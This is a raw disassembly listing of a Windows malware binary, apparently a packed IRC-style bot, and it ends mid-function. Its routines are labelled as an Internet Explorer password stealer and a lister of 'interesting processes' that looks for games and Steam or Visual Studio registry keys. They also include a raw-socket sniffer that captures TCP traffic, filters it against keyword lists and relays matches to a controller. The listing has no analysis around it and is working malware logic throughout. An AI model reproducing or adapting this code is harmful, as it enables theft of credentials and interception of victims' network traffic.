cmp ds:dword_41DF50, 0
jnz short loc_415AFF
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415AF0+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415B15
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415B15: ; CODE XREF: sub_415AF0+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push [ebp+var_4]
push offset sub_414EF4
call sub_4095A4
add esp, 10h
locret_415B3D: ; CODE XREF: sub_415AF0+D�j
; sub_415AF0+23�j
leave
retn
sub_415AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3F proc near ; CODE XREF: UPX0:00416FB6�p
; UPX0:00416FBF�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short locret_415B5E
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
locret_415B5E: ; CODE XREF: sub_415B3F+D�j
leave
retn
sub_415B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B60 proc near ; DATA XREF: sub_415DFD+35�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5C0 = dword ptr -5C0h
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_41C = byte ptr -41Ch
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5B8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
and [ebp+var_5C4], 0
and [ebp+var_410], 0
and [ebp+var_40C], 0
and [ebp+var_408], 0
and [ebp+var_404], 0
and [ebp+var_5BC], 0
jmp short loc_415BC2
; ---------------------------------------------------------------------------
loc_415BB5: ; CODE XREF: sub_415B60:loc_415C50�j
mov eax, [ebp+var_5BC]
inc eax
mov [ebp+var_5BC], eax
loc_415BC2: ; CODE XREF: sub_415B60+53�j
cmp [ebp+var_5BC], 0FFFFh
jnb loc_415C55
push 400h
lea eax, [ebp+var_400]
push eax
push [ebp+var_5BC]
call ds:dword_4171E4 ; GetWindowTextA
push 7
push offset aUnreal3 ; "Unreal3"
lea eax, [ebp+var_400]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_415C0E
mov [ebp+var_410], 1
loc_415C0E: ; CODE XREF: sub_415B60+A2�j
push offset aWorldOfWarcraf ; "World Of Warcraft"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C2F
mov [ebp+var_408], 1
loc_415C2F: ; CODE XREF: sub_415B60+C3�j
push offset aConquer ; "[Conquer]"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C50
mov [ebp+var_404], 1
loc_415C50: ; CODE XREF: sub_415B60+E4�j
jmp loc_415BB5
; ---------------------------------------------------------------------------
loc_415C55: ; CODE XREF: sub_415B60+6C�j
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415C88
mov [ebp+var_5C4], 1
loc_415C88: ; CODE XREF: sub_415B60+11C�j
push [ebp+var_5C0]
call ds:dword_417028 ; RegCloseKey
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415CC7
mov [ebp+var_40C], 1
loc_415CC7: ; CODE XREF: sub_415B60+15B�j
push [ebp+var_5C0]
call ds:dword_417028 ; RegCloseKey
movsx eax, [ebp+var_41C]
test eax, eax
jz short loc_415D1E
cmp [ebp+var_410], 0
jnz short loc_415D1E
cmp [ebp+var_5C4], 0
jnz short loc_415D1E
cmp [ebp+var_40C], 0
jnz short loc_415D1E
cmp [ebp+var_408], 0
jnz short loc_415D1E
cmp [ebp+var_404], 0
jnz short loc_415D1E
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
jmp locret_415DF9
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: sub_415B60+17C�j
; sub_415B60+185�j ...
cmp [ebp+var_404], 0
jz short loc_415D33
mov [ebp+var_5C8], offset aYes ; "Yes"
jmp short loc_415D3D
; ---------------------------------------------------------------------------
loc_415D33: ; CODE XREF: sub_415B60+1C5�j
mov [ebp+var_5C8], offset aNo ; "No"
loc_415D3D: ; CODE XREF: sub_415B60+1D1�j
cmp [ebp+var_408], 0
jz short loc_415D52
mov [ebp+var_5CC], offset aYes ; "Yes"
jmp short loc_415D5C
; ---------------------------------------------------------------------------
loc_415D52: ; CODE XREF: sub_415B60+1E4�j
mov [ebp+var_5CC], offset aNo ; "No"
loc_415D5C: ; CODE XREF: sub_415B60+1F0�j
cmp [ebp+var_40C], 0
jz short loc_415D71
mov [ebp+var_5D0], offset aYes ; "Yes"
jmp short loc_415D7B
; ---------------------------------------------------------------------------
loc_415D71: ; CODE XREF: sub_415B60+203�j
mov [ebp+var_5D0], offset aNo ; "No"
loc_415D7B: ; CODE XREF: sub_415B60+20F�j
cmp [ebp+var_5C4], 0
jz short loc_415D90
mov [ebp+var_5D4], offset aYes ; "Yes"
jmp short loc_415D9A
; ---------------------------------------------------------------------------
loc_415D90: ; CODE XREF: sub_415B60+222�j
mov [ebp+var_5D4], offset aNo ; "No"
loc_415D9A: ; CODE XREF: sub_415B60+22E�j
cmp [ebp+var_410], 0
jz short loc_415DAF
mov [ebp+var_5D8], offset aYes ; "Yes"
jmp short loc_415DB9
; ---------------------------------------------------------------------------
loc_415DAF: ; CODE XREF: sub_415B60+241�j
mov [ebp+var_5D8], offset aNo ; "No"
loc_415DB9: ; CODE XREF: sub_415B60+24D�j
push [ebp+var_5C8]
push [ebp+var_5CC]
push [ebp+var_5D0]
push [ebp+var_5D4]
push [ebp+var_5D8]
push offset dword_41D67C
lea eax, [ebp+var_5B4]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
locret_415DF9: ; CODE XREF: sub_415B60+1B9�j
leave
retn 4
sub_415B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DFD proc near ; CODE XREF: sub_40A9CF+12FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415E17
jmp short locret_415E3F
; ---------------------------------------------------------------------------
loc_415E17: ; CODE XREF: sub_415DFD+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push [ebp+var_4]
push offset sub_415B60
call sub_4095A4
add esp, 10h
locret_415E3F: ; CODE XREF: sub_415DFD+18�j
leave
retn
sub_415DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E41 proc near ; CODE XREF: sub_415EB7+37�p
; sub_415EB7+59�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_415E52
; ---------------------------------------------------------------------------
loc_415E4B: ; CODE XREF: sub_415E41+69�j
; sub_415E41:loc_415EB1�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_415E52: ; CODE XREF: sub_415E41+8�j
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jz short loc_415EB3
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EB1
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4+4], 0
jz short loc_415EAC
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EAC
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EAC: ; CODE XREF: sub_415E41+49�j
; sub_415E41+67�j
push 1
pop eax
jmp short locret_415EB5
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E41+3A�j
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E41+1D�j
xor eax, eax
locret_415EB5: ; CODE XREF: sub_415E41+6E�j
leave
retn
sub_415E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EB7 proc near ; CODE XREF: sub_415F69+420�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
jz short loc_415EDD
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EDD
push 1
pop eax
jmp loc_415F67
; ---------------------------------------------------------------------------
loc_415EDD: ; CODE XREF: sub_415EB7+7�j
; sub_415EB7+1C�j
cmp [ebp+arg_8], 1
jb short loc_415EFF
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7AC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415EFF
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415EFF: ; CODE XREF: sub_415EB7+2A�j
; sub_415EB7+41�j
cmp [ebp+arg_8], 2
jb short loc_415F21
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D808
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F21
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F21: ; CODE XREF: sub_415EB7+4C�j
; sub_415EB7+63�j
cmp [ebp+arg_8], 3
jb short loc_415F43
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D87C
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F43
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F43: ; CODE XREF: sub_415EB7+6E�j
; sub_415EB7+85�j
cmp [ebp+arg_8], 4
jb short loc_415F65
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D8C0
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F65
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F65: ; CODE XREF: sub_415EB7+90�j
; sub_415EB7+A7�j
xor eax, eax
loc_415F67: ; CODE XREF: sub_415EB7+21�j
; sub_415EB7+46�j ...
pop ebp
retn
sub_415EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F69 proc near ; DATA XREF: sub_41665C+A6�o
var_19B8 = dword ptr -19B8h
var_19B4 = byte ptr -19B4h
var_18B4 = dword ptr -18B4h
var_18B0 = byte ptr -18B0h
var_17B0 = dword ptr -17B0h
var_17AC = dword ptr -17ACh
var_17A8 = byte ptr -17A8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = byte ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = byte ptr -160Ch
var_140C = byte ptr -140Ch
var_127E = byte ptr -127Eh
var_1278 = byte ptr -1278h
var_1274 = byte ptr -1274h
var_1268 = word ptr -1268h
var_1264 = byte ptr -1264h
var_1263 = byte ptr -1263h
var_125C = dword ptr -125Ch
var_1258 = word ptr -1258h
var_1254 = byte ptr -1254h
var_1154 = dword ptr -1154h
var_1150 = dword ptr -1150h
var_114C = byte ptr -114Ch
var_114B = byte ptr -114Bh
var_104C = dword ptr -104Ch
var_1048 = word ptr -1048h
var_1044 = dword ptr -1044h
var_1038 = byte ptr -1038h
var_1037 = byte ptr -1037h
var_1030 = byte ptr -1030h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 19B8h
call sub_416BC0
push edi
push 3ABh
push [ebp+arg_0]
lea eax, [ebp+var_1614]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movsx eax, [ebp+var_160C]
neg eax
sbb eax, eax
lea ecx, [ebp+var_160C]
and eax, ecx
mov [ebp+var_1624], eax
push 0
push 3
push 2
call ds:dword_417218 ; socket
mov [ebp+var_104C], eax
cmp [ebp+var_104C], 0FFFFFFFFh
jnz short loc_415FDE
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_415FDE: ; CODE XREF: sub_415F69+60�j
push 0FFh
lea eax, [ebp+var_1254]
push eax
call ds:dword_417260 ; gethostname
lea eax, [ebp+var_1254]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp+var_1154], eax
cmp [ebp+var_1154], 0
jnz short loc_41602B
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: sub_415F69+A1�j
push 10h
push 0
lea eax, [ebp+var_1048]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1048], 2
mov eax, [ebp+var_1154]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_1044], eax
push 10h
lea eax, [ebp+var_1048]
push eax
push [ebp+var_104C]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_416093
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415F69+109�j
mov [ebp+var_1150], 1
push 0
push 0
lea eax, [ebp+var_1620]
push eax
push 0
push 0
push 4
lea eax, [ebp+var_1150]
push eax
push 98000001h
push [ebp+var_104C]
call ds:dword_41725C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4160EA
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_4160EA: ; CODE XREF: sub_415F69+160�j
lea eax, [ebp+var_1030]
mov [ebp+var_161C], eax
and [ebp+var_1628], 0
and [ebp+var_4], 0
push [ebp+var_1610]
mov eax, [ebp+var_1614]
push dword ptr [eax]
push offset unk_41DA8C
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1274], 0
and [ebp+var_114C], 0
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_114B]
rep stosd
stosw
stosb
and [ebp+var_1264], 0
xor eax, eax
lea edi, [ebp+var_1263]
stosd
stosb
lea eax, [ebp+var_114C]
push eax
call sub_40CF25
push eax
call sub_4044F7
pop ecx
pop ecx
lea eax, [ebp+var_1264]
push eax
call sub_40CF25
push eax
call sub_4045B2
pop ecx
pop ecx
lea eax, [ebp+var_114C]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_1618], eax
lea eax, [ebp+var_1264]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1268], ax
and [ebp+var_1038], 0
xor eax, eax
lea edi, [ebp+var_1037]
stosd
stosb
lea eax, [ebp+var_1038]
push eax
call sub_40CF25
push eax
call sub_404552
pop ecx
pop ecx
mov eax, [ebp+var_1044]
mov [ebp+var_125C], eax
lea eax, [ebp+var_1038]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1258], ax
loc_4161E6: ; CODE XREF: sub_415F69+305�j
; sub_415F69+33A�j ...
push 0
push 1028h
lea eax, [ebp+var_1030]
push eax
push [ebp+var_104C]
call ds:dword_417248 ; recv
mov [ebp+var_17AC], eax
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_416217
jmp loc_416637
; ---------------------------------------------------------------------------
loc_416217: ; CODE XREF: sub_415F69+2A7�j
cmp [ebp+var_17AC], 0FFFFFFFFh
jz short loc_416229
cmp [ebp+var_17AC], 0
jnz short loc_41622E
loc_416229: ; CODE XREF: sub_415F69+2B5�j
jmp loc_416637
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: sub_415F69+2BE�j
mov eax, [ebp+var_17AC]
and [ebp+eax+var_1030], 0
mov eax, [ebp+var_161C]
mov al, [eax]
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_161C]
lea eax, [ecx+eax*4]
mov [ebp+var_1628], eax
mov eax, [ebp+var_1628]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_416273
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416273: ; CODE XREF: sub_415F69+303�j
mov eax, [ebp+var_1628]
mov al, [eax+0Ch]
shr al, 4
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_1628]
lea eax, [ecx+eax*4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_4162A8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162A8: ; CODE XREF: sub_415F69+338�j
push [ebp+var_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_17AC], eax
mov eax, [ebp+var_161C]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jnz loc_416632
movsx eax, [ebp+var_127E]
test eax, eax
jz short loc_4162EB
mov eax, [ebp+var_161C]
mov eax, [eax+10h]
cmp eax, [ebp+var_125C]
jz short loc_4162EB
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162EB: ; CODE XREF: sub_415F69+36A�j
; sub_415F69+37B�j
movsx eax, [ebp+var_1278]
test eax, eax
jz short loc_41630C
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jz short loc_41630C
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: sub_415F69+38B�j
; sub_415F69+39C�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; ntohs
movzx eax, ax
movzx ecx, [ebp+var_1258]
cmp eax, ecx
jnz short loc_416340
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jnz short loc_416340
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416340: ; CODE XREF: sub_415F69+3BF�j
; sub_415F69+3D0�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; ntohs
movzx eax, ax
movzx ecx, [ebp+var_1268]
cmp eax, ecx
jnz short loc_416374
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_1618]
jnz short loc_416374
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: sub_415F69+3F3�j
; sub_415F69+404�j
push [ebp+var_1624]
push [ebp+var_1610]
push [ebp+var_17AC]
push [ebp+var_4]
call sub_415EB7
add esp, 10h
test eax, eax
jz loc_416632
and [ebp+var_19B8], 0
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_415F69:loc_416413�j
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_4163AF: ; CODE XREF: sub_415F69+437�j
mov eax, [ebp+var_19B8]
cmp eax, [ebp+var_17AC]
jnb short loc_416415
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4163DA
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Dh
loc_4163DA: ; CODE XREF: sub_415F69+463�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_4163F7
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 3Eh
loc_4163F7: ; CODE XREF: sub_415F69+480�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_416413
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Eh
loc_416413: ; CODE XREF: sub_415F69+49C�j
jmp short loc_4163A2
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: sub_415F69+452�j
and [ebp+var_19B8], 0
mov eax, [ebp+var_19B8]
mov [ebp+var_17AC], eax
jmp short loc_416437
; ---------------------------------------------------------------------------
loc_41642A: ; CODE XREF: sub_415F69+507�j
; sub_415F69+51A�j ...
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_416437: ; CODE XREF: sub_415F69+4BF�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41645F
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
jmp short loc_4164AA
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_415F69+4DC�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jl short loc_416472
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416472: ; CODE XREF: sub_415F69+505�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_416485
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416485: ; CODE XREF: sub_415F69+518�j
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_17AC]
inc eax
mov [ebp+var_17AC], eax
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_4164AA: ; CODE XREF: sub_415F69+4F4�j
cmp [ebp+var_17AC], 0
jnz short loc_4164B8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4164B8: ; CODE XREF: sub_415F69+548�j
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+0Ch]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_19B4]
push eax
call sub_407A56
add esp, 0Ch
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+10h]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_18B0]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_1628]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; ntohs
movzx eax, ax
push eax
lea eax, [ebp+var_18B0]
push eax
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; ntohs
movzx eax, ax
push eax
lea eax, [ebp+var_19B4]
push eax
push offset dword_41DA58
lea eax, [ebp+var_17A8]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov [ebp+var_18B4], eax
mov eax, 180h
sub eax, [ebp+var_18B4]
push eax
push [ebp+var_4]
mov eax, [ebp+var_18B4]
lea eax, [ebp+eax+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_4165AD
jmp loc_416655
; ---------------------------------------------------------------------------
loc_4165AD: ; CODE XREF: sub_415F69+63D�j
mov eax, 180h
sub eax, [ebp+var_18B4]
dec eax
mov [ebp+var_17B0], eax
loc_4165BF: ; CODE XREF: sub_415F69+6C7�j
mov eax, [ebp+var_17B0]
cmp eax, [ebp+var_17AC]
jnb short loc_416632
push 180h
mov eax, [ebp+var_4]
add eax, [ebp+var_17B0]
push eax
lea eax, [ebp+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_41661F
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_41661F: ; CODE XREF: sub_415F69+6B2�j
mov eax, [ebp+var_17B0]
add eax, 17Fh
mov [ebp+var_17B0], eax
jmp short loc_4165BF
; ---------------------------------------------------------------------------
loc_416632: ; CODE XREF: sub_415F69+35B�j
; sub_415F69+42A�j ...
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416637: ; CODE XREF: sub_415F69+2A9�j
; sub_415F69:loc_416229�j ...
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_416657
; ---------------------------------------------------------------------------
loc_416653: ; CODE XREF: sub_415F69+6B4�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416655: ; CODE XREF: sub_415F69+63F�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: sub_415F69+70�j
; sub_415F69+BD�j ...
pop edi
leave
retn 4
sub_415F69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41665C proc near ; CODE XREF: sub_40A9CF+9FE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push 3ABh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41667B
jmp locret_41670F
; ---------------------------------------------------------------------------
loc_41667B: ; CODE XREF: sub_41665C+18�j
cmp [ebp+arg_4], 0
jz short loc_41668F
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
jmp short loc_416696
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: sub_41665C+23�j
mov [ebp+var_8], 3
loc_416696: ; CODE XREF: sub_41665C+31�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp [ebp+arg_8], 0
jz short loc_4166AD
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
jmp short loc_4166B4
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: sub_41665C+47�j
mov [ebp+var_C], offset byte_41DF00
loc_4166B4: ; CODE XREF: sub_41665C+4F�j
push 200h
push [ebp+var_C]
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 208h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+4]
push offset dword_41DAC0
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_415F69
call sub_4095A4
add esp, 14h
locret_41670F: ; CODE XREF: sub_41665C+1A�j
leave
retn
sub_41665C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416711 proc near ; CODE XREF: sub_4167B9+6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41673B
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_41673D
; ---------------------------------------------------------------------------
loc_41673B: ; CODE XREF: sub_416711+1A�j
xor eax, eax
locret_41673D: ; CODE XREF: sub_416711+28�j
leave
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41673F proc near ; CODE XREF: sub_40A9CF+C23�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41679C
push 2
push 0
push [ebp+var_4]
